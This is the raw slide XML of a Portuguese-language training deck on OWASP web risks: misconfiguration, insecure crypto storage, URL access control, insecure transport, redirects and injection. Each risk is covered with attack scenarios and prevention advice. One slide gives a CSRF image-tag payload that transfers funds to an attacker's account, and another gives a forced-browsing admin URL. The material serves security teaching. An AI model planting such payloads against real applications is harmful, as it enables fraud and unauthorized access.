              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>Aplicação permite que o usuário envie os dados do request abertamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>Atacante muda o request de modo a trasnferir o valor da conta da vítima para a sua conta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;img src=“ http://example.com/app/transferFunds? amount=1500&amp;destinationAccount=attackersAcct#“width="0" height="0" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>Se a vítima estiver autenticada e clicar na figura, a operação será executada.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28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25009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Má configuração de aplicações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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacantes externos e usuários com suas próprias contas..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante utiliza conta padrão de sistemas, páginas não usadas, arquivos desprotegidos.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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29</a:t>
            </a:fld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524000"/>
            <a:ext cx="7848600" cy="1353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51390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Riscos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Todos os fatores analisados na tabela de avaliação do risco são variáveis de sistema para sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>As definições do valor de cada item deve ser dada por quem faz a análise de risco.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3</a:t>
            </a:fld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9592" y="4437112"/>
            <a:ext cx="723900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8775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Má configuração de aplicações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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Fraqueza:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Pode acontecer em qualquer nível da aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Desenvolvedor e administrador são responsáveis pelas ações.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Podem dar acesso não autorizado a atacantes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Também podem comprometer o sistema todo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicação indisponível, dados roubados/modificados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Custo de recuperaçao muito alto.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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30</a:t>
            </a:fld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524000"/>
            <a:ext cx="7848600" cy="1353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990862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Má configuração de aplicações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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Devemos garantir que toda infraestrutura esta corretamente configurada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Todos os softwares utilizados são atualizados?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Tudo que não é mais necessário foi removido?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Contas default foram desabilitadas?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>O tratamento de erros é adequado?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31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49894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Má configuração de aplicações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Como previnir má configuração de aplicações ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Desenvolvimento, Q&amp;A e produção devem serguir os mesmo passos na configuração do ambiente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Se possível deve ser automatizado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Manter as aplicações sempre atualizadas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Arquitetura robusta com segurança em todos componentes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Rodar scans e fazer auditoria periodicamente.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32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97605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Má configuração de aplicações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Cenário do ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Sua aplicação utiliza algum framework conhecido como Struts ou Spring.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>É identificado uma falha nesses frameworks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Até que não seja corrigido essa vulnerabilidade, a falha fica disponivel na aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer conta default que seja deixada habilitada quando instalda a aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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33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76903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Armazenamento  com criptografia insegura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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Usuários do sistema em busca de dados protegidos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque normalmente não visa quebrar a criptografia.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Busca por chaves não armazenadas seguramente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Acesso por canais que já tenham decriptado a informação.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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34</a:t>
            </a:fld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676400"/>
            <a:ext cx="7772400" cy="1236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7469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Armazenamento  com criptografia insegura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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Fraqueza:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Não encriptar dados que devem ser encriptados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Armazenamento fraco das chaves de criptografia.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Pode comprometer os dados .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Normalmente a informação criptografada são dados sensíveis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Dados criptografados são críticos para o negócio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Possíveis danos legais pela exposição de informações sigilosas.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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35</a:t>
            </a:fld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676400"/>
            <a:ext cx="7772400" cy="1236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1277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Armazenamento  com criptografia insegura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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Primeira ação é determinar quais dados deve ser criptografados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Tanto os dados quanto seus backups devem ser mantidos criptografados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilizar um algoritmo forte de criptografia.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilizo uma chave forte e ela é protegida de acesso não autorizado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Há uma política de troca periódica de chaves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36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924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Armazenamento  com criptografia insegura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Como previnir armazenamento com criptografia insegura?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Devemos atender no mínimo ao seguintes pontos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Garantir que os backups são criptografados e armazenados em lugar diferente de onde esta a aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Garantir que as chaves estão protegidas e são guardadas adequadamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Garantir a utilização de algoritmos de hash para armazenamento de senhas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Garantir que todas senhas são protegidas de acessos não autorizados.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37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76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Armazenamento  com criptografia insegura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 smtClean="0"/>
              <a:t>Cenário de ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Um banco de dados armazenando números de cartões de crédito encriptados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Configurado para no retorno do banco já efetuar a decriptação dos números.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Desse modo com um sql injection, o atacante consegue buscar os números de cartões de crédito sem precisar decriptografá-los.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38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902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Restrição de Acesso a URL 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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer usuário com acesso à rede.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante – autorizado – muda a URL para uma página com privilégios diferentes dos seus.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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39</a:t>
            </a:fld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524000"/>
            <a:ext cx="7848600" cy="1261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9882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3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer um que consiga enviar dados para a aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante envia texto simples contendo o código injetado, buscando explorar a vulnerabilidade da interpretação desse código.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4</a:t>
            </a:fld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676400"/>
            <a:ext cx="7610902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203569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Restrição de Acesso a URL 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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800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Fraqueza:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Páginas que não fazem checagem de quem às acessam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Problemas na configuração deixando-as expostas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Usuários buscam ter acesso à area administrativa da aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Variável dependendo da página acessada.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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40</a:t>
            </a:fld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524000"/>
            <a:ext cx="7848600" cy="1261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426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Restrição de Acesso a URL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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Só podemos afimar com convicção se testarmos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" smtClean="0"/>
              <a:t>todas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t> as páginas de nossas aplicações.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Para cada página considerar acesso público ou privado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Página requer autorização?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Deve ser visível para qualquer usuário autenticado?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Verificar botões e links.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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41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81666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Restrição de Acesso a URL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Como previnir restrição de acesso a URL em minha aplicação?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Normalmente utilizamos um componte responsável pela validação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Basear a autenticação e a autorização em papéis de usuários.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>As políticas de acesso devem ser configuráveis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Validação por default deve negar acesso a todos.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42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8308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Restrição de Acesso a URL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Cenário de ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Supondo um usuário autenticado navegando na aplicação:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://example.com/app/getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Se o atacante mudar a URL para:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://example.com/app/admin_getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>A aplicação não validar o nível de acesso do usuário e assim permitir seu acesso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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43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27773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Comunicação insegura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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer um que consiga monitorar a rede.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Monitorar o tráfego de rede não é uma tarefa segura.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Monitorar a rede enquanto o usuário está acessando um site com falhas de segurança.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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44</a:t>
            </a:fld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00200"/>
            <a:ext cx="7924800" cy="1241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375904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Comunicação insegura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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800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Fraquezas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Aplicações não protegem o tráfego na internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilização de conexões seguras aparenas para autenticação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Fácil detecção.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impaco técnico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Dados capturados levam atacante a roubar a conta da vítima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Impacto nos negócios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Deve ser considerado o canal de comunicação e os dados ali em trânsito.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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45</a:t>
            </a:fld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00200"/>
            <a:ext cx="7924800" cy="1241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668484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Comunicação insegura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Minha aplicação é vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilizo SSL para proteger todo tráfego referente a autenticação da aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>SSL é utilizado para todos recusos privados da página.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Setar os cookies para nunca serem transmitidos como clear text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Não utilizo certificados expirados no servidor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Certificado do servidor está devidamente configurado.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46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43260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Comunicação insegura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Como posso evitar comunicação insegura em minha aplicação?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>É fácil aplicar SSL para todo o site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Questões de peformance nos levam a aplicar SSL apenas nas partes críticas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Utilizar SSL em todas páginas que contenham informações sensíveis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Setar a ‘secure’ flag em todos cookies utilizados na aplicação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Garantir que o certificado utilizado é válido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Backend também deve utilizar SSL.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47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81362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Comunicação insegura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Caso de ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Página que não utiliza SSL na autenticação.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante monitora a rede e observa o cookie autenticado de sessão da vítima.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante utiliza esse cookie para roubar a sessão.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Site que simplesmente utiliza ODBC/JDBC diretamente para uma conexão a um banco de dados.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48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88893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Redirecionamentos não validados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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Quem são os agentes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Qualquer um que consiga enganar o usuário a enviar um request ao servidor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Ataque:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Atacante engana a vítima através de links não validados pela aplicação.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49</a:t>
            </a:fld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676400"/>
            <a:ext cx="7696200" cy="1241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30657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Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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14400" y="3124200"/>
            <a:ext cx="7772400" cy="2971800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pt-B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Fraqueza:</a:t>
            </a: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Aplicação confia nos dados</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR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recebidos</a:t>
            </a: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r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" smtClean="0"/>
